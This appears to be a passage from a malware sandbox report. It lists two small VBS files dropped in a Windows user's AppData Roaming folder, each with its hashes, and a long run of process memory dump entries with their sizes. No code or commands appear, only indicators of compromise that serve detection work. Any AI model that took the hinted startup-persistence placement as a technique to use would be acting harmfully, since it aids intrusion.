215627015f4375c6ff7a22add35163ca15c4c794a7cc828f5746a55cfe25131354d0f42fbb4825c5df207dfc4c159cba7141d4f609a1b9ab098888c9ac4fd25f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_674.vbs

Filesize
115B

MD5
a0db79e6403b18f108c1636558b493c1

SHA1
af4194912dc6bb73c3557969521f90bab3786271

SHA256
ab1d4be57b8601a0cf2c1f004473cd6feed78a83a2f2888489d72c0686c8db7c

SHA512
3610190c72a66411b5cc25bafadf109648372ae3ae900fe143b98dc3e9b96e96d8cef648bbefed3fb0c03b7312e26da40de2f3fc98026d642a35ffb80debf719

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_796.vbs

Filesize
115B

MD5
7c8050feda519114ef3fe3a254c9930d

SHA1
f5042849eef50de913d0d39b146613e45a9a8b8b

SHA256
f34d236408935417dcfefe152cd31c607bacb56c3b4d5ecb5e5cad1a0f1839de

SHA512
f5944bf1e7fd92101d112b30cf831d6e9aa7d61164987df1762334757cbbc1fde28bc7dbaf9eb4dc839321adbe177b0e0081e315d7cc557206614a0e889ee0ee

Download Submit
memory/1136-724-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-729-0x000002345EA10000-0x000002345EA11000-memory.dmp

Filesize
4KB

Download
memory/1136-718-0x000002345EDD0000-0x000002345EDD1000-memory.dmp

Filesize
4KB

Download
memory/1136-719-0x000002345EDD0000-0x000002345EDD1000-memory.dmp

Filesize
4KB

Download
memory/1136-720-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-721-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-722-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-723-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-685-0x0000023456740000-0x0000023456750000-memory.dmp

Filesize
64KB

Download
memory/1136-725-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-726-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-727-0x000002345EDF0000-0x000002345EDF1000-memory.dmp

Filesize
4KB

Download
memory/1136-728-0x000002345EA20000-0x000002345EA21000-memory.dmp

Filesize
4KB

Download
memory/1136-717-0x000002345EDD0000-0x000002345EDD1000-memory.dmp

Filesize
4KB

Download
memory/1136-737-0x000002345E950000-0x000002345E951000-memory.dmp

Filesize
4KB

Download
memory/1136-734-0x000002345EA10000-0x000002345EA11000-memory.dmp

Filesize
4KB

Download
memory/1136-731-0x000002345EA20000-0x000002345EA21000-memory.dmp

Filesize
4KB

Download
memory/1136-745-0x000002345EB50000-0x000002345EB51000-memory.dmp

Filesize
4KB

Download
memory/1136-747-0x000002345EB60000-0x000002345EB61000-memory.dmp

Filesize
4KB

Download
memory/1136-748-0x000002345EB60000-0x000002345EB61000-memory.dmp

Filesize
4KB

Download
memory/1136-749-0x000002345EC70000-0x000002345EC71000-memory.dmp

Filesize
4KB

Download
memory/1136-701-0x0000023456840000-0x0000023456850000-memory.dmp

Filesize
64KB

Download
memory/2472-0-0x00007FFB5DE53000-0x00007FFB5DE55000-memory.dmp

Filesize
8KB

Download
memory/2472-1-0x0000000000790000-0x0000000000880000-memory.dmp

Filesize
960KB

Download
memory/2924-50-0x000002C148990000-0x000002C1489A6000-memory.dmp

Filesize
88KB

Download
memory/3388-21-0x000001C76DAE0000-0x000001C76DB18000-memory.dmp

Filesize
224KB

Download
memory/3388-20-0x000001C76D820000-0x000001C76D828000-memory.dmp

Filesize
32KB

Download
memory/3388-19-0x000001C76D830000-0x000001C76D852000-memory.dmp

Filesize
136KB

Download